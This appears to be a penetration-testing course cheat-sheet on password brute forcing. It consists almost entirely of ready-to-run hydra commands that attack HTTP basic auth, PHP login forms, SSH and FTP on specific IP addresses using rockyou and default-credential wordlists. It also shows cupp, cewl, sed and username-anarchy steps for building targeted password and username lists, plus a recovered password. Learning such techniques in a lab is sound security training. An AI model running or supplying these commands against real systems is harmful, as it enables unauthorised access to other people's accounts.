6.0 Brute Forcing
hydra
$ apt install hydra -y
$ hydra -C /opt/useful/SecLists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt 178.211.23.155 -s 31099 http-get /
$ hydra -L /opt/useful/SecLists/Usernames/Names/names.txt -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt -u -f 178.35.49.134 -s 32901 http-get /
hydra -L /opt/useful/SecLists/Usernames/Names/usernames.txt -p amormio -u -f 178.35.49.134 -s 32901 http-get /
Identify supported services
$ hydra -h | grep "Supported services" | tr ":" "\n" | tr " " "\n" | column -e
Two http modules
# Basic AUthentication
http[s]-{head|get|post}
# login forms, .php or .aspx
http[s]-post-form
$hydra http-post-form -U
Http-post-form
"/login.php:[user parameter]=^USER^&[password parameter]=^PASS^:F=<form name='login'"
hydra -C /opt/useful/SecLists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt 178.35.49.134 -s 32901 http-post-form "/login.php:username=^USER^&password=^PASS^:F=<form name='login'"
hydra -l admin -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt -f 178.35.49.134 -s 32901 http-post-form "/login.php:username=^USER^&password=^PASS^:F=<form name='login'"
Personalized wordlist
cewl
cupp
sudo apt install cupp
sed -ri '/^.{,7}$/d' william.txt # remove shorter than 8
sed -ri '/[!-/:-@\[-`\{-~]+/!d' william.txt # remove no special chars
sed -ri '/[0-9]+/!d' william.txt # remove no numbers
Mangling
https://github.com/digininja/RSMangler
https://github.com/sc0tfree/mentalist
Custom Username
https://github.com/urbanadventurer/username-anarchy
git clone https://github.com/urbanadventurer/username-anarchy.git
./username-anarchy Bill Gates > bill.txt
Attack SSH
$ hydra -L bill.txt -P william.txt -u -f ssh://178.35.49.134:22 -t 4
$ hydra -l m.gates -P rockyou-10.txt ftp://127.0.0.1
user
password
user harrypotter